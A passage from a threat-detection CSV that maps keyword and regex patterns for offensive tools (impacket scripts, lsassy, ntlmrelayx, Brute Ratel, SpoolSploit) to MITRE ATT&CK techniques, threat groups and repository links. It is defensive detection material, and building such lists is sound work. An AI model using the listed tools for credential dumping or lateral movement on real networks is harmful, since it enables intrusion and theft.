TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*imaprelayclient.py*",".{0,1000}imaprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*IMDS Service Spoofing Enabled*",".{0,1000}IMDS\sService\sSpoofing\sEnabled.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*IMDSPoof Honey Token*",".{0,1000}IMDSPoof\sHoney\sToken.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*IMDSpoof*IMDS.go*",".{0,1000}IMDSpoof.{0,1000}IMDS\.go.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" 
"*IMDSpoof-main*",".{0,1000}IMDSpoof\-main.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*imp_Badger*",".{0,1000}imp_Badger.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*impacket minikerberos*",".{0,1000}impacket\sminikerberos.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*impacket*",".{0,1000}impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. 
The library provides a set of tools as examples of what can be done within the context of this library","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket*",".{0,1000}impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-* *",".{0,1000}impacket\-.{0,1000}\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-*.tar.gz*",".{0,1000}impacket\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.*",".{0,1000}impacket\..{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*impacket.*",".{0,1000}impacket\..{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*'impacket.*",".{0,1000}\'impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.dcerpc*",".{0,1000}impacket\.dcerpc.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*impacket.dcerpc.v5*",".{0,1000}impacket\.dcerpc\.v5.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*impacket.dcerpc.v5*",".{0,1000}impacket\.dcerpc\.v5.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*impacket.git*",".{0,1000}impacket\.git.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.krb5.asn1*",".{0,1000}impacket\.krb5\.asn1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.krb5.ccache*",".{0,1000}impacket\.krb5\.ccache.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.krb5.kerberosv5*",".{0,1000}impacket\.krb5\.kerberosv5.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.ldap*",".{0,1000}impacket\.ldap.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.ldap*",".{0,1000}impacket\.ldap.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*impacket.msada_guids*",".{0,1000}impacket\.msada_guids.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.ntlm*",".{0,1000}impacket\.ntlm.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","135","13","2024-05-01T16:30:51Z","2021-06-09T19:27:08Z" "*impacket/*.py*",".{0,1000}impacket\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket:latest*",".{0,1000}impacket\:latest.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket__init__*",".{0,1000}impacket__init__.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket_findDelegation*",".{0,1000}impacket_findDelegation.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*impacket_rpcdump_output_*",".{0,1000}impacket_rpcdump_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*impacket-atexec*",".{0,1000}impacket\-atexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-dcomexec*",".{0,1000}impacket\-dcomexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketfile.py*",".{0,1000}impacketfile\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*impacket-GetADUsers*",".{0,1000}impacket\-GetADUsers.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-GetNPUsers*",".{0,1000}impacket\-GetNPUsers.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-getST*",".{0,1000}impacket\-getST.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-getTGT*",".{0,1000}impacket\-getTGT.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketldap_shell*",".{0,1000}impacketldap_shell.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketlogger*",".{0,1000}impacketlogger.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-lookupsid*",".{0,1000}impacket\-lookupsid.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketmssqlshell*",".{0,1000}impacketmssqlshell.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-netview*",".{0,1000}impacket\-netview.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketntlmrelayx*",".{0,1000}impacketntlmrelayx.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketos_ident*",".{0,1000}impacketos_ident.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
